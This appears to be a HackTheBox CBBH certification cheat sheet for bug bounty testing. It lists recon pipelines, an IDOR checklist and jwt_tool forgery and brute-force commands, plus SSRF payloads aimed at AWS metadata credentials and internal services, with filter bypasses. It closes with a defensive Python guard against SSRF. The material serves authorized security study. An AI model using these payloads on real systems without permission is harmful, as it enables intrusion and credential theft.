CBBH (HackTheBox)

HTB Certified Bug Bounty Hunter

Intermediate | 7-day practical exam | Pass: Passing report | $210

Web vulnerability assessment for bug bounty — XSS, IDOR, SSRF, auth bypass, API hacking.

Issuer: HackTheBox
Format: 7-day practical exam
Duration: 7 days
Pass Score: Passing report
Cheat Sheets
Bug Bounty Recon & Attack Reference

Bug Bounty Recon Pipeline

# Subdomain enum
subfinder -d target.com -silent | anew subs.txt
amass enum -passive -d target.com | anew subs.txt
# Certificate Transparency
curl "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u | anew subs.txt

# Probe live hosts
cat subs.txt | httpx -silent -sc -title -tech-detect -o live.txt

# Get all known URLs
cat subs.txt | gau --threads 5 | sort -u | anew urls.txt
cat subs.txt | waybackurls | sort -u | anew urls.txt

# Find interesting params/endpoints
grep -E "\?|\.php|\.asp|\.jsp" urls.txt | sort -u > params.txt

# JavaScript analysis
cat live.txt | subjs | sort -u > js_files.txt
cat js_files.txt | while read -r url; do curl -s "$url" | grep -oE '(\/api|\/v[0-9]|token|secret|key)[^"'"'"' ]+'; done

IDOR & Broken Auth Testing

# IDOR checklist
# 1. Capture authenticated request with your user ID
# 2. Change ID to another user's ID in all parameters:
#    - URL path: /api/users/1337 → /api/users/1338
#    - Query params: ?user_id=1337 → ?user_id=1338
#    - JSON body: {"id": 1337} → {"id": 1338}
#    - Headers: X-User-ID: 1337
# 3. Check indirect references (encoded IDs, hashed IDs)
#    - Base64 decode, hash lookup

# Auth bypass (jwt_tool; <JWT> is the captured token)
# JWT alg:none
python3 jwt_tool.py <JWT> -X a
# JWT key confusion (RS256 → HS256)
python3 jwt_tool.py <JWT> -X k -pk public.pem
# Brute force JWT secret
python3 jwt_tool.py <JWT> -C -d /usr/share/wordlists/rockyou.txt

SSRF Exploitation Chain

# Basic SSRF detection
# Find parameters that fetch URLs: url=, redirect=, image=, src=, href=, path=
# Test with Burp Collaborator or interactsh

# AWS metadata (critical finding)
url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
url=http://169.254.169.254/latest/user-data

# Internal service enumeration
url=http://localhost:6379/   # Redis
url=http://localhost:5432/   # PostgreSQL
url=http://localhost:8500/   # Consul
url=http://localhost:9200/   # Elasticsearch

# Filter bypass
url=http://0/
url=http://127.1/
url=http://[::1]/
url=http://①②⑦.①/
url=dict://127.0.0.1:6379/info
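The filter bypasses above work because a deny-list on the literal string "127.0.0.1" never sees the address the HTTP client actually connects to. The guard below is an added example (not HTB course material): it allows only http(s) on 80/443, resolves the host to addresses, and refuses anything that is not publicly routable, so the shorthand hosts, the circled digits and the metadata IP all fail the same check. The function names and the sample hostnames in the resolver table are constructed for this example.

```python
# Added example (not HTB course material): server-side guard for a "fetch this
# URL" feature. Allow only http(s) on 80/443, resolve the host, and refuse any
# address that is not publicly routable (loopback, link-local, private, ...).
import ipaddress
import socket
import unicodedata
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

def resolve_host(host):
    """Default resolver: every address the OS returns for host (injectable for tests)."""
    return [info[4][0] for info in socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)]

def parse_ip_literal(host):
    """Strict IPv4/IPv6 text first, then the loose forms inet_aton accepts ('0', '127.1')."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None  # a hostname, not an IP literal

def check_fetch_url(url, resolver=resolve_host):
    """Return (allowed, reason); anything not clearly public is refused."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if not parts.hostname:
        return False, "missing host"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, f"port not allowed: {port}"
    # NFKC folds look-alike digits (①②⑦.① -> 127.1) before the literal check.
    host = unicodedata.normalize("NFKC", parts.hostname)
    literal = parse_ip_literal(host)
    addrs = [literal] if literal else [ipaddress.ip_address(a) for a in resolver(host)]
    for addr in addrs:
        if not addr.is_global:
            return False, f"{host} resolves to non-public {addr}"
    return True, f"ok: {host} -> " + ", ".join(str(a) for a in addrs)
```

The fetch itself must connect to the address that passed this check and re-run it on every redirect target; a client that resolves the name again on its own can end up somewhere the guard never saw.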

For IDOR bugs, always check if the object reference is sequential. If so, write a Burp Intruder/Turbo Intruder attack to test all IDs and compare response sizes.